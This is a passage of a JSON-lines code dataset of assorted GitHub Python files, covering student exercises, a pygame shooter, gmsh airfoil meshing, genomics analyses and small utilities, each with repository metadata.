'<br>'\n\t\treturn html\n\n\thtml = message + '<br>'\n\n\tfor doctype in non_standard_docs_map:\n\t\tif non_standard_docs_map[doctype]:\n\t\t\thtml += get_html(non_standard_docs_map[doctype], doctype)\n\n\treturn html","repo_name":"finbyz/finbyz_dashboard","sub_path":"finbyz_dashboard/finbyz_dashboard/dashboard_overrides/dashboard.py","file_name":"dashboard.py","file_ext":"py","file_size_in_byte":3357,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"23477223486","text":"'''\nCreated on 4 de mai de 2018\n\n@author: Romulo\n'''\nfrom itertools import combinations\ndef avoids(word, forbiddenLetters):\n for forbiddenLetter in forbiddenLetters:\n if forbiddenLetter in word:\n return False\n return True\n\n\n\nif 
__name__ == '__main__':\n totalWords = 0\n allowedWords = 0\n ratioOfForbiddenWords = 1\n lettersAndRatio = []\n wordsOfFile = []\n lessLetters = \"\"\n fin = open(\"words.txt\")\n for line in fin:\n totalWords += 1\n wordsOfFile.append(line.strip())\n for forbiddenLetter in \"abcdefghijklmnopqrstuvwxyz\" :\n for word in wordsOfFile:\n if avoids(word, forbiddenLetter):\n allowedWords += 1\n partialRatioOfForbiddenWords = 1 - allowedWords / totalWords\n #print(\"%s : %.3f %%\" % (forbiddenLetter, partialRatioOfForbiddenWords * 100))\n if partialRatioOfForbiddenWords < ratioOfForbiddenWords:\n ratioOfForbiddenWords = partialRatioOfForbiddenWords\n lessLetters = forbiddenLetter\n # print( \"%s : %.3f %%\" %(lessLetters, ratioOfForbiddenWords*100))\n lettersAndRatio.append((forbiddenLetter, partialRatioOfForbiddenWords * 100))\n allowedWords = 0\n lettersAndRatio = sorted(lettersAndRatio, key=lambda x : x[1])[:7]\n lessCommonLetters = \"\".join([x[0] for x in lettersAndRatio])\n \n print (lessCommonLetters)\n listOfLettersCombinations = list(combinations(lessCommonLetters, 5))\n for combinationOfLetters in listOfLettersCombinations:\n for word in wordsOfFile:\n if avoids(word, combinationOfLetters):\n allowedWords += 1\n partialRatioOfForbiddenWords = 1 - allowedWords / totalWords\n print(\"%s : %.3f %%\" % (\"\".join(combinationOfLetters), partialRatioOfForbiddenWords * 100))\n allowedWords = 0","repo_name":"romulopro/thinkInPython","sub_path":"Cap9/Exercise9-3-2.py","file_name":"Exercise9-3-2.py","file_ext":"py","file_size_in_byte":1835,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"43852897489","text":"import urllib\nimport json\n\nextra_data = {\n 'foo': 'aaa',\n 'bar': 'bbb',\n}\n\njson_params = json.dumps(extra_data)\n\nform_data = {'api_key': '123123123', 'format': 'json', 'data-type': 'json', 'data': json_params}\n\nparams = urllib.urlencode(data)\n\nf = urllib.urlopen(\"http://www.musi-cal.com/cgi-bin/query\", params)\n\nprint(f.read())\n","repo_name":"PdxCodeGuild/2014-Summer-Evening-Intro-To-Programming-With-Python","sub_path":"week11/post_json_from_python/post.py","file_name":"post.py","file_ext":"py","file_size_in_byte":335,"program_lang":"python","lang":"hi","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"73935710199","text":"import os\r\nimport matplotlib.pyplot as plt\r\n\r\ndef checa_vez_atual():\r\n vez = 0\r\n # Caso o arquivo não exista (1ª vez)\r\n if not os.path.isfile('vezAtual.txt'):\r\n with open('vezAtual.txt', 'w') as f:\r\n f.write('1')\r\n vez = 1\r\n else:\r\n with open('vezAtual.txt', 'r') as f:\r\n tempvez = f.readline()\r\n tempvez = int(tempvez)\r\n vez = tempvez\r\n vez += 1\r\n with open('vezAtual.txt', 'w') as f:\r\n f.write(str(vez))\r\n return vez\r\n\r\n\r\ndef cria_pasta(vezAtual):\r\n dirName = '{}_teste'.format(vezAtual)\r\n try:\r\n os.mkdir(dirName)\r\n print(\"Pasta \" , dirName , \" criada \") \r\n except FileExistsError:\r\n print(\"Pasta \" , dirName , \" já existe\")\r\n\r\n\r\ndef salva_relatorio(vezAtual, texto):\r\n pasta = '{}_teste'.format(vezAtual)\r\n nomearq = '{}\\\\{}_relatorio.txt'.format(pasta, vezAtual)\r\n\r\n with open(nomearq, 'w') as f:\r\n f.write(texto)\r\n\r\n\r\ndef salva_fig_melhor_fitness(vezAtual, geracoes, tamanho, listafitness):\r\n pasta = '{}_teste'.format(vezAtual)\r\n geracoes = list(range(1, geracoes+1))\r\n plt.plot(geracoes, listafitness)\r\n plt.grid()\r\n plt.title('Execuções com poupulação = {} (melhor 
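# Editor's note (added): the post.py record above references an undefined name
# (`data` instead of `form_data`) and uses the Python 2 urllib API, so it fails
# under Python 3. A sketch of the same request with Python 3's stdlib:
import json
from urllib.parse import urlencode
from urllib.request import urlopen

extra_data = {"foo": "aaa", "bar": "bbb"}
form_data = {
    "api_key": "123123123",
    "format": "json",
    "data-type": "json",
    "data": json.dumps(extra_data),
}
params = urlencode(form_data).encode("utf-8")  # POST body must be bytes
with urlopen("http://www.musi-cal.com/cgi-bin/query", params) as f:
    print(f.read())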
fitness)'.format(tamanho))\r\n plt.xlabel('Gerações')\r\n plt.ylabel('Fitness')\r\n plt.savefig('{}\\\\{}_melhor_fitness.png'.format(pasta, vezAtual))\r\n\r\n\r\ndef salva_fig_media_fitness(vezAtual, geracoes, tamanho, listafitness, listamedia):\r\n pasta = '{}_teste'.format(vezAtual)\r\n geracoes = list(range(1, geracoes+1))\r\n plt.plot(geracoes, listafitness, 'b-', label='fitness')\r\n plt.plot(geracoes, listamedia, 'r-', label='média')\r\n plt.legend(loc=0)\r\n plt.title('Média das execuções com poupulação = {}'.format(tamanho))\r\n plt.xlabel('Gerações')\r\n plt.ylabel('Fitness')\r\n plt.grid()\r\n plt.savefig('{}\\\\{}_media_fitness.png'.format(pasta, vezAtual))","repo_name":"felipegarcia99/tetris-ag","sub_path":"usina_arquivos.py","file_name":"usina_arquivos.py","file_ext":"py","file_size_in_byte":1946,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"23932879816","text":"#!/usr/bin/env python\n\n# Load required modules\nimport sys, os, argparse, pandas as pd, logging, numpy as np\n\n# Helpers for parsing categories into substitution, left flanking,\n# and right flanking\ndef sub(c): return c.split('[')[1].split(']')[0]\ndef lf(c): return c.split('[')[0]\ndef rf(c): return c.split(']')[-1]\n\nif __name__ == '__main__':\n # Parse command-line arguments\n parser = argparse.ArgumentParser()\n parser.add_argument('-i', '--input_file', type=str, required=True)\n parser.add_argument('-o', '--output_file', type=str, required=True)\n parser.add_argument('-v', '--verbosity', type=int, required=False, default=logging.INFO)\n args = parser.parse_args(sys.argv[1:])\n\n # Set up logger\n logger = logging.getLogger(__name__)\n logger.setLevel(args.verbosity)\n\n # Load the signatures\n logger.info('[Loading the signatures]')\n with open(args.input_file, 'r') as IN:\n arrs = [ l.rstrip('\\n\\t').split('\\t') for l in IN ]\n header = arrs.pop(0)\n\n # Get categories and sort according to standard\n categories = [ arr[2] for arr in arrs ]\n categories.sort(key=lambda c: (sub(c), lf(c), rf(c)))\n \n # Create a container for the signatures\n sig_names = header[3:]\n K = len(sig_names)\n L = len(categories)\n sigs = np.zeros((K, L))\n\n # Parse the lines in the file\n for arr in arrs:\n j = categories.index(arr[2])\n for i, sig_name in enumerate(sig_names):\n sigs[i,j] += float(arr[3+i])\n\n logger.info('- Loaded %s x %s signature matrix' % sigs.shape)\n\n # Create dataframe and output to file\n logger.info('[Creating dataframe]')\n df = pd.DataFrame(index=sig_names, columns=categories, data=sigs)\n\n logger.info('- Saving to %s' % args.output_file)\n df.to_csv(args.output_file, sep='\\t')\n","repo_name":"lrgr/sigma","sub_path":"src/process_cosmic_signatures.py","file_name":"process_cosmic_signatures.py","file_ext":"py","file_size_in_byte":1858,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"40"} +{"seq_id":"2663313370","text":"# -*- coding: utf-8 -*-\n__author__ = 'matanaliz'\n\nimport pygame\nfrom player import Player\nfrom enemy import Enemy\nfrom weapon import Shotgun\nfrom event import *\nimport random\n\n\nclass Entities(object):\n \"\"\"\n Hold up player, bullets, enemies, gui entities for proper render and collision detection\n \"\"\"\n\n def __init__(self):\n #Sprite groups init\n self.player_group = pygame.sprite.Group()\n self.bullet_group = pygame.sprite.Group()\n self.foe_group = pygame.sprite.Group()\n\n #Init enemy generating values. 
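# Editor's note (added): a worked example of the category helpers in the
# COSMIC-signature record above, using the standard 96-context notation:
c = "A[C>A]G"
# sub(c) -> "C>A"  (the substitution, between '[' and ']')
# lf(c)  -> "A"    (left flanking base, before '[')
# rf(c)  -> "G"    (right flanking base, after ']')
# Sorting categories by (sub, lf, rf) therefore groups them by substitution
# first, then by flanking context.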
Should be changed.\n self.count = 10\n self.wave = 0\n\n self.player = Player(pygame.display.get_surface().get_rect())\n #TODO pass player position, not whole\n weapon = Shotgun(self.player, self.bullet_group)\n self.player.give_weapon(weapon)\n self.player_group.add(self.player)\n\n self.event_dispatcher = 0\n\n def set_event_dispatcher(self, event_dispatcher):\n \"\"\"\n Setting event dispatcher\n :param event_dispatcher:\n \"\"\"\n assert isinstance(event_dispatcher, EventDispatcher)\n self.event_dispatcher = event_dispatcher\n\n #Apply event dispatcher for all other\n self.player.set_event_dispatcher(event_dispatcher)\n\n def generate_foes(self):\n #Add more stronger enemies with waves\n self.wave += 1\n\n screen_rect = pygame.display.get_surface().get_rect()\n\n #Adding more same enemies with waves\n for i in range(self.count + (self.wave * 2)):\n pos = (self.random_two_period(-200, 0, screen_rect.height, screen_rect.height + 200),\n self.random_two_period(-200, 0, screen_rect.height, screen_rect.height + 200))\n enemy = Enemy(self.player, pos)\n enemy.foe_group = self.foe_group\n if not pygame.sprite.spritecollideany(enemy, self.foe_group):\n self.foe_group.add(enemy)\n\n @staticmethod\n def random_two_period(start1, end1, start2, end2):\n return random.choice([random.randint(start1, end1), random.randint(start2, end2)])\n\n def check_for_collision(self):\n # Check player collision\n foe = pygame.sprite.spritecollideany(self.player, self.foe_group)\n if foe is not None:\n # Do something if player is dead\n self.player.apply_damage(foe.attack())\n else:\n collision_dict = pygame.sprite.groupcollide(self.bullet_group, self.foe_group, False, False)\n for bullet, foes in collision_dict.items():\n for foe in foes:\n if foe.apply_damage(bullet.get_damage()):\n # Dispatch event to health bar\n if self.event_dispatcher:\n self.event_dispatcher.dispatch_event(GameEvent(GameEvent.SCORE_GOT, foe.get_score()))\n foe.kill()\n\n # Bullet is removed if was collided\n bullet.kill()\n\n def update(self):\n # Check for collisions\n self.check_for_collision()\n if len(self.foe_group) <= 1:\n # Generate more enemies.\n self.generate_foes()\n\n screen = pygame.display.get_surface()\n\n self.player_group.update()\n self.player_group.draw(screen)\n\n self.bullet_group.update()\n self.bullet_group.draw(screen)\n\n self.foe_group.update()\n self.foe_group.draw(screen)\n\n","repo_name":"matanaliz/PyLand","sub_path":"source/entities.py","file_name":"entities.py","file_ext":"py","file_size_in_byte":3441,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"5087780926","text":"import random\r\n\r\nfunction = str(input(\"What function do you want to do?\"))\r\nif function == \"Roll a dice\" or \"roll a dice\":\r\n rolled = random.randint(0, 6)\r\n print(\"The number that was randomly generated is\", rolled)\r\n\r\nelif function == \"Flip a coin\" or \"flip a coin\":\r\n flipped = random.randint(0,1)\r\n if flipped == 0:\r\n print(\"You got heads\")\r\n else:\r\n print(\"You got Tails\")\r\n\r\n","repo_name":"Aryan-kinge/School-code","sub_path":"Dice simulator.py","file_name":"Dice simulator.py","file_ext":"py","file_size_in_byte":409,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"39391365708","text":"# Mario Benavides\r\n# Status - Completed\r\n# This program will calculate the total rainfall for the year, \r\n# the average rainfall for the year, \r\n# and the months with the highest and lowest 
rainfall.\r\n\r\n\r\n\r\ndef main():\r\n num_months = 12 # set the range\r\n total = 0 # for math\r\n \r\n # Create a list of months.\r\n months = ['January', 'Febuary', 'March', 'April', 'May', 'June',\r\n 'July', 'August', 'September', 'October', 'November', 'December']\r\n \r\n # Create an empty list to store the rainfall amounts.\r\n rain_amount = [0]*num_months\r\n\r\n\r\n\r\n \r\n # Use a loop to ask the user for the rainfall amount for the month \r\n # and store it in the list at the appropriate index for the month.\r\n try:\r\n \r\n for index in range(num_months): \r\n print('Enter the rainfall for ', months[index], ': ', sep='', end='') \r\n rain_amount[index] = float(input()) # input into index\r\n while rain_amount[index] < 0: # input validation\r\n rain_amount[index] = float(input('Error: Each rainfall amount '\r\n 'should be a positive number: '))\r\n\r\n \r\n num_months+1 # count up to range\r\n\r\n total += rain_amount[index] # for math\r\n \r\n except ValueError: # so it doesnt just crash and burn.\r\n print('Error: Please enter a rainfall amount for each month.')\r\n\r\n\r\n\r\n \r\n # display the values entered\r\n print() # extra space\r\n print('Total rainfall: ', format(total, ',.2f')) \r\n \r\n average = total / len(months)\r\n print('Average rainfall: ', format(average, ',.2f')) \r\n \r\n highest = max(rain_amount)\r\n which_month = months[rain_amount.index(highest)] # new variable, which month, numbers, biggest one, to the variable\r\n print('Highest rainfall: ', which_month)\r\n \r\n lowest = min(rain_amount)\r\n which_month = months[rain_amount.index(lowest)] # new variable, which month, numbers, lowest one, to the variable\r\n print('Lowest rainfall: ', which_month)\r\n \r\n \r\n# call the main function\r\nmain()\r\n","repo_name":"MarioBen22/Total-Average-Min-Max-Rainfall_-Lab-7","sub_path":"Benavides_Lab7.py","file_name":"Benavides_Lab7.py","file_ext":"py","file_size_in_byte":2401,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"9043224028","text":"import unittest\n\nfrom project.mammal import Mammal\n\n\nclass TestMammal(unittest.TestCase):\n def test_initialization(self):\n mammal = Mammal(\"Deli\", \"female\", \"boo\")\n self.assertEqual(\"Deli\", mammal.name)\n self.assertEqual(\"female\", mammal.type)\n self.assertEqual(\"boo\", mammal.sound)\n self.assertEqual(\"animals\", mammal._Mammal__kingdom)\n\n def test_make_sound(self):\n mammal = Mammal(\"Deli\", \"female\", \"boo\")\n expected = mammal.make_sound()\n self.assertEqual(expected, f\"Deli makes boo\")\n\n def test_get_kingdom(self):\n mammal = Mammal(\"Deli\", \"female\", \"boo\")\n mammal._Mammal__kingdom = \"test\"\n expected = mammal.get_kingdom()\n self.assertEqual(expected, f\"test\")\n\n def test_info(self):\n mammal = Mammal(\"Deli\", \"female\", \"boo\")\n expected = mammal.info()\n self.assertEqual(expected, f\"Deli is of type female\")\n\n\nif __name__ == '__main__':\n unittest.main()","repo_name":"ZvezdelinaPetrova/Softuni","sub_path":"oop/testing/exercise/project/test/test_mammal.py","file_name":"test_mammal.py","file_ext":"py","file_size_in_byte":974,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"31958260713","text":"import gmsh\nimport numpy as np\nimport scipy.interpolate as sint\nimport argparse\nimport json\n\n\ndef structured_mesh(airfoilpath, writepath, mesh_params):\n\n \"\"\"\n A pygmsh function to create a structure transfinite airfoil for suitable for 
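# Editor's note (added): the mammal tests above reach a "private" attribute via
# Python name mangling: inside class Mammal, `self.__kingdom` is stored as
# `_Mammal__kingdom`, so it stays reachable (and patchable) from tests:
class Demo:
    def __init__(self):
        self.__kingdom = "animals"

d = Demo()
print(d._Demo__kingdom)  # -> animals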
OpenFOAM\n simulation. \n \"\"\"\n\n\n chord_length = mesh_params[\"chordlength\"]\n L_x = mesh_params[\"DomainLength\"]\n L_y = mesh_params[\"DomainHeight\"]\n N_r = mesh_params[\"Rdivs\"]\n N_1 = mesh_params[\"Zone1\"]\n N_2 = mesh_params[\"Zone2\"]\n N_3 = mesh_params[\"Zone3\"]\n N_H = mesh_params[\"Hdivs\"]\n gratio = mesh_params[\"R_ratio\"]\n hratio = mesh_params[\"H_ratio\"]\n span = mesh_params[\"span\"]\n\n # initialize gmsh CAD engine\n gmsh.initialize()\n\n # set model name\n gmsh.model.add(mesh_params[\"name\"])\n\n # airfoildata read \n # example: airfoilpath -> \"./mesh/NRELs826.txt\"\n \n airfoildata = chord_length*np.loadtxt(airfoilpath, delimiter=',')\n airfoildata = airfoildata + np.array([3*chord_length, 0.])\n \n # calculate centroid of data points\n AFcentroid = np.mean(airfoildata, axis=0) \n\n # interpolate data via a Bspline (optional)\n spline = sint.splprep(airfoildata.T, s=0.0, k=2)\n t = np.linspace(0, 1, 300)\n coords = np.array(sint.splev(t, spline[0], der=0)).T\n\n # gmsh uses the OpenCASCADE kernel for CAD I/O and generation\n\n tags = []\n # airfoil point generation\n for i in range(len(coords)):\n gmsh.model.occ.addPoint(coords[i,0], coords[i,1], 0.0, tag=i+1)\n tags.append(i+1)\n tags.append(1)\n\n # spline interpolation of curve using gmsh module\n spl = gmsh.model.occ.addSpline(tags, 1)\n airfoilloop = gmsh.model.occ.addCurveLoop([spl])\n \n\n # point definition\n center = gmsh.model.occ.addPoint(0.0,0.0,0.0)\n p1 = gmsh.model.occ.addPoint(3.3*chord_length, AFcentroid[1], 0.0)\n p3 = gmsh.model.occ.addPoint(7*chord_length, L_y*chord_length, 0.0)\n p4 = gmsh.model.occ.addPoint(7*chord_length,-L_y*chord_length, 0.0)\n p5 = gmsh.model.occ.addPoint(L_x*chord_length, L_y*chord_length,0.0)\n p6 = gmsh.model.occ.addPoint(L_x*chord_length,-L_y*chord_length,0.0)\n p7 = gmsh.model.occ.addPoint(L_x*chord_length, 0.0, 0.0)\n\n C1 = gmsh.model.occ.addPoint(0.0,\n L_y*chord_length,\n 0.0)\n C5 = gmsh.model.occ.addPoint(0.0,\n -L_y*chord_length,\n 0.0)\n\n # exterior 1d domain definition\n\n circ1 = gmsh.model.occ.addCircleArc(C5, center, C1)\n \n l1 = gmsh.model.occ.addLine(C1, p3)\n l6 = gmsh.model.occ.addLine(p4, C5)\n\n l2 = gmsh.model.occ.addLine(p3, p5)\n l3 = gmsh.model.occ.addLine(p5, p7)\n l4 = gmsh.model.occ.addLine(p7, p6)\n l5= gmsh.model.occ.addLine(p6, p4)\n\n l7 = gmsh.model.occ.addLine(tags[0], p3)\n l8 = gmsh.model.occ.addLine(tags[0], p4)\n l9 = gmsh.model.occ.addLine(tags[0], p7)\n l10 = gmsh.model.occ.addLine(p1, C1)\n l11 = gmsh.model.occ.addLine(p1, C5)\n\n gmsh.model.occ.synchronize()\n\n # cut sections for different mesh types\n fragments_sect1 = gmsh.model.occ.fragment([(1, airfoilloop)], [(1, l10), (1, l11)])\n\n gmsh.model.occ.synchronize()\n \n\n # add curve loops for extrusion\n outlet1 = gmsh.model.occ.addCurveLoop([l2, l3, l9, l7])\n outlet2 = gmsh.model.occ.addCurveLoop([l5, l4, l9, l8])\n\n inletmid = gmsh.model.occ.addCurveLoop([circ1, \n fragments_sect1[1][1][1][1],\n fragments_sect1[1][0][1][1], \n fragments_sect1[1][2][1][1]])\n\n inlettop = gmsh.model.occ.addCurveLoop([l1, l7, \n fragments_sect1[1][0][0][1],\n fragments_sect1[1][1][1][1]])\n\n inletbottom = gmsh.model.occ.addCurveLoop([l6, l8, \n fragments_sect1[1][0][2][1],\n fragments_sect1[1][2][1][1]])\n\n gmsh.model.occ.synchronize()\n\n # add Planar surface entities\n\n surfout1 = gmsh.model.occ.addPlaneSurface([outlet1])\n surfout2 = gmsh.model.occ.addPlaneSurface([outlet2])\n surfinmid = gmsh.model.occ.addPlaneSurface([inletmid])\n surfintop = 
gmsh.model.occ.addPlaneSurface([inlettop])\n surfinbottom =gmsh.model.occ.addPlaneSurface([inletbottom])\n gmsh.model.occ.synchronize()\n surfaces = [(2, surfout1),\n (2, surfout2),\n (2, surfinmid),\n (2, surfintop),\n (2, surfinbottom)]\n\n # set domains to be meshed by a transfinite algorithm (structured mesh)\n # all radial divisions will have a number N_r of divisions with the same growth ratio\n \n # Radially outward divisions\n gmsh.model.mesh.setTransfiniteCurve(l7, N_r, \"Progression\", gratio)\n gmsh.model.mesh.setTransfiniteCurve(l8, N_r, \"Progression\", gratio)\n gmsh.model.mesh.setTransfiniteCurve(fragments_sect1[1][1][1][1], N_r, \"Progression\", gratio)\n gmsh.model.mesh.setTransfiniteCurve(fragments_sect1[1][2][1][1], N_r, \"Progression\", gratio)\n gmsh.model.mesh.setTransfiniteCurve(l3, N_r,\"Progression\", -gratio)\n gmsh.model.mesh.setTransfiniteCurve(l4, N_r,\"Progression\", gratio)\n\n # inlet and front of airfoil \n gmsh.model.mesh.setTransfiniteCurve(fragments_sect1[1][0][1][1], N_1)\n gmsh.model.mesh.setTransfiniteCurve(circ1, N_1)\n\n #spline top/bottom hourglass sections\n gmsh.model.mesh.setTransfiniteCurve(fragments_sect1[1][0][0][1], N_2)\n gmsh.model.mesh.setTransfiniteCurve(l1, N_2)\n gmsh.model.mesh.setTransfiniteCurve(l6, N_3)\n gmsh.model.mesh.setTransfiniteCurve(fragments_sect1[1][0][2][1], N_3)\n\n # horizontal outlet\n gmsh.model.mesh.setTransfiniteCurve(l2, N_H, \"Progression\", hratio)\n gmsh.model.mesh.setTransfiniteCurve(l9, N_H, \"Progression\", hratio) \n gmsh.model.mesh.setTransfiniteCurve(l5, N_H, \"Progression\",-hratio)\n \n # set transfinite surfaces for gridding\n gmsh.model.mesh.setTransfiniteSurface(surfout1, \"Left\")\n gmsh.model.mesh.setTransfiniteSurface(surfout2, \"Left\")\n gmsh.model.mesh.setTransfiniteSurface(surfinmid, \"Left\")\n gmsh.model.mesh.setTransfiniteSurface(surfintop, \"Left\")\n gmsh.model.mesh.setTransfiniteSurface(surfinbottom, \"Left\")\n\n gmsh.model.mesh.setRecombine(2, surfout1)\n gmsh.model.mesh.setRecombine(2, surfout2)\n gmsh.model.mesh.setRecombine(2, surfinmid)\n gmsh.model.mesh.setRecombine(2, surfintop)\n gmsh.model.mesh.setRecombine(2, surfinbottom)\n\n gmsh.model.occ.synchronize()\n\n # Extrude model for OpenFOAM compatibility\n OFairfoil = gmsh.model.occ.extrude(surfaces, 0, 0, span, numElements=[1], \\\n heights = [1], recombine=True) \n\n gmsh.model.occ.synchronize()\n\n # physical domain identification for OpenFOAM compatibility\n\n volumes = []\n fusedvol = []\n surfs = []\n\n for x in OFairfoil:\n if x[0] == 3:\n fusedvol.append(x)\n volumes.append(x[1])\n elif x[0]==2: \n surfs.append(x)\n else: \n continue\n \n\n sides = [surf[1] for surf in surfaces]\n inlet = []\n outlet= []\n object= []\n \n \n for x in surfs: \n if x[1] == 21 or x[1] == 17 or x[1] == 24: \n object.append(x[1])\n elif x[1] == 10 or x[1] == 14 or x[1] == 25 or x[1] == 22 or x[1] == 19:\n sides.append(x[1])\n elif x[1] == 1 or x[1] == 2 or x[1] == 3 or x[1] == 4 or x[1] == 5:\n sides.append(x[1])\n elif x[1] == 7 or x[1] == 13:\n outlet.append(x[1])\n elif x[1] == 6 or x[1] == 36 or x[1] == 15 or x[1] == 23 or x[1] == 11 or x[1] == 20: \n inlet.append(x[1])\n else: \n continue\n\n gmsh.model.addPhysicalGroup(2, object, name=\"airfoil\")\n gmsh.model.addPhysicalGroup(2, sides, name=\"sides\")\n gmsh.model.addPhysicalGroup(2, inlet, name=\"inlet\")\n gmsh.model.addPhysicalGroup(2, outlet, name=\"outlet\")\n gmsh.model.addPhysicalGroup(3, volumes, name=\"fluid\")\n\n gmsh.model.occ.synchronize()\n\n 
gmsh.option.setNumber(\"Mesh.Smoothing\", 100)\n gmsh.model.mesh.generate(2) \n gmsh.model.occ.synchronize()\n \n gmsh.model.mesh.generate(3)\n gmsh.option.setNumber(\"Mesh.MshFileVersion\", 2.)\n gmsh.write(writepath) \n gmsh.finalize()\n\n\nif __name__ == '__main__':\n \n parser = argparse.ArgumentParser()\n\n parser.add_argument(\"--airfoil\", \n help=\"Airfoil path definition\",\n type=str)\n\n parser.add_argument(\"--writepath\", \n help=\"Write path definition\",\n type=str)\n \n parser.add_argument(\"--meshparams\",\n help=\"Mesh parameters json file path\",\n type=str)\n\n args = parser.parse_args()\n\n with open(args.meshparams) as meshfile: \n mesh_params = json.load(meshfile)\n\n structured_mesh(args.airfoil, args.writepath, mesh_params)","repo_name":"jkhansell/CFDFinalProject","sub_path":"StructuredGrids/meshstudy/scripts/structuredmesh.py","file_name":"structuredmesh.py","file_ext":"py","file_size_in_byte":8954,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"73901460919","text":"import sys\ninput = lambda: sys.stdin.readline()\n\ndef solution(N):\n result = []\n for a in range(N//5+1): \n if 5*a+3*((N - a*5)//3) == N:\n result.append(a+(N - a*5)//3)\n if len(result) == 0:\n return -1\n return min(result)\n \n \n \n\nN = int(input())\nS = solution(N)\nprint(S)\n","repo_name":"Hoya324/Python-Study","sub_path":"기본 수학1/BOJ 2829[설탕 배달] .py","file_name":"BOJ 2829[설탕 배달] .py","file_ext":"py","file_size_in_byte":329,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"23942862406","text":"#This script does the following:\r\n# (1) Find the cell lines with high expression level of gene of interest (GOI). \r\n# Here \"high expression level\" is defined as the top 1/3-quantile with regards to RPKM value)\r\n# (2) For each gene in DepMap gene dependency data, perform wilcoxon ranksum test \r\n# to see if cell lines with high GOI expression level has higher or worse dependency level than the remaining cell lines.\r\n\r\nimport pandas as pd\r\nimport numpy as np\r\nimport scipy as sp\r\nimport argparse\r\nimport sys\r\nfrom scipy.stats import mannwhitneyu\r\n\r\nparser = argparse.ArgumentParser()\r\nparser.add_argument('-g','--gene',type = str,required = True)\r\nparser.add_argument('-rs','--rpkm_subset',type = str,required = True)\r\nparser.add_argument('-gds','--gene_dependency_subset',type = str,required = True)\r\nparser.add_argument('-o','--output',type = str, required=True)\r\nargs = parser.parse_args(sys.argv[1:])\r\n\r\n#load datasets\r\ndf_rpkm = pd.read_csv(args.rpkm_subset,sep = '\\t',header=0, index_col=0 )\r\ndf_gd = pd.read_csv(args.gene_dependency_subset,sep = '\\t', header = 0, index_col =0)\r\n\r\n# (1) Find the cell lines with high expression level of gene of interest (GOI). 
\r\n# find cells with high GOI expresison level (defined as top 1/3 quartile) and the remaining cells (the remaining 2/3-quantile)\r\ncutoff = round((1/3)*len(df_rpkm))\r\ndf_high_GOI_expression = pd.DataFrame(df_rpkm.iloc[0:cutoff])\r\nhigh_GOI_cells = list(df_high_GOI_expression.index)\r\nnon_high_GOI_cells = set(df_rpkm.index)-set(high_GOI_cells)\r\n\r\nprint('Among {} cell lines, {} have high {} expression level'.format(len(df_rpkm),len(high_GOI_cells),args.gene))\r\n\r\n# (2) For each gene in DepMap gene dependency data, perform wilcoxon ranksum test \r\n# to see if cell lines with high GOI expression level has higher or worse dependency level than the remaining cell lines.\r\n# create empty dict for information needed\r\nstats = dict()\r\npvals = dict()\r\nhigh_means = dict()\r\nhigh_stds = dict()\r\nremain_means = dict()\r\nremain_stds = dict()\r\n\r\n# iterate over each of the 17634 genes in the DepMap dataset and perform wilcoxon ranksum test between gene dependency score \r\n# of cell lines with high expression level of GOI and the remaining cell lines. The results are saved as dict entries.\r\nfor gene in list(df_gd.columns):\r\n df_g = pd.DataFrame(df_gd[gene])\r\n high_GOI_gen_dep = pd.DataFrame(df_g.loc[high_GOI_cells])\r\n non_high_GOI_gen_dep = pd.DataFrame(df_g.loc[non_high_GOI_cells])\r\n high_means[gene] = np.mean(high_GOI_gen_dep[gene])\r\n high_stds[gene] = np.std(high_GOI_gen_dep[gene])\r\n remain_means[gene] = np.mean(non_high_GOI_gen_dep[gene])\r\n remain_stds[gene]= np.std(non_high_GOI_gen_dep[gene])\r\n if high_means[gene]> remain_means[gene]:\r\n mwu_alt = 'greater'\r\n else:\r\n mwu_alt = 'less'\r\n mwu = mannwhitneyu(high_GOI_gen_dep[gene],non_high_GOI_gen_dep[gene], use_continuity = False, alternative =mwu_alt)\r\n stats[gene] = mwu[0]\r\n pvals[gene] = mwu[1]\r\n \r\n# combine the results into a data frame\r\nresults = [stats,pvals,high_means,high_stds,remain_means,remain_stds]\r\ndf_results = pd.DataFrame(results).T\r\ndf_results.columns = ['mwu_stat','mwu_pval','high_mean','high_std','remain_mean','remain_std']\r\n\r\n# select significant data based on pval and saved it to another df\r\ndf_results_sig = pd.DataFrame(df_results[df_results['mwu_pval']<=0.05])\r\n\r\n# add a column to show whether the difference in gene dependency scores indicates proliferative advantange or disadvantage\r\n# higher scores = proliferative advantage, lower scores = disadvantage\r\ndf_results_sig['adv_or_disadv'] = df_results_sig['high_mean']>df_results_sig['remain_mean']\r\ndf_results_sig =df_results_sig.replace({True:'adv',False:'disadv'})\r\n\r\n# add a column to show the absolute difference between gene dependency scores of cells with high GOI expression level and the remaining cells\r\ndf_results_sig['diff'] = abs(df_results_sig['high_mean']-df_results_sig['remain_mean'])\r\n\r\n#sort results by absolute difference\r\ndf_results_sig = df_results_sig.sort_values(by = ['diff'],ascending= False)\r\n\r\n#save results to tsv\r\ndf_results_sig.to_csv(args.output,sep= '\\t')","repo_name":"lrgr/CENPA-SDL","sub_path":"src/pan_cancer_unbiased_gene_dependency_analysis.py","file_name":"pan_cancer_unbiased_gene_dependency_analysis.py","file_ext":"py","file_size_in_byte":4145,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"33877134712","text":"from data import data\n\nimport models as m\n\n\ndef load_data(db):\n try:\n # Загружаем дни недели в базу\n for wd, name in data.weekdays.items():\n 
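# Editor's note (added): the analysis above chooses the one-sided alternative
# from the two group means before testing; the same pattern on toy data:
import numpy as np
from scipy.stats import mannwhitneyu

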